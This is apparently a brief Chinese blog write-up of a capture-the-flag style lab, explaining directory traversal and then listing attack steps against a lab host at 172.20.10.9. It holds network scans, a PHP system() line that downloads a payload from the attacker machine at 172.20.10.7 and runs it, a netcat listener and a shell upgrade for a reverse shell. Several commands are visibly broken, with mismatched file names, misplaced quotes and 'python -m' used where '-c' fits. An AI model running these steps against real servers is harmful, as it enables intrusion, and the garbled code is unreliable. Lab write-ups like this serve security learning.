赞
踩
在开始之前,先介绍一下目录遍历漏洞的原理
目录遍历漏洞原理比较简单,就是程序在实现上没有充分过滤用户输入的…/之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。这里的目录跳转符可以是…/,也可是…/的ASCII编码或者是unicode编码等。
链接:https://pan.baidu.com/s/1rkcs2rhBPch3Q5beSZJ4Rg
提取码:20td
netdiscover -i eth0
nmap -sV 172.20.10.9
dirb http://172.20.10.9
cd /usr/share/webshells/php
cp php-reverse-shell.php /root/Desktop/shell.php
<?php system("cd /tmp;wget http://172.20.10.7:8000/shellcode.php;chmod +x shell.php;php shell.php);"?>
python -m "SimpleHTTPServer"
nc -nlvp 4444
python -m "import pty; pty.spawn('/bin/bash')"
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。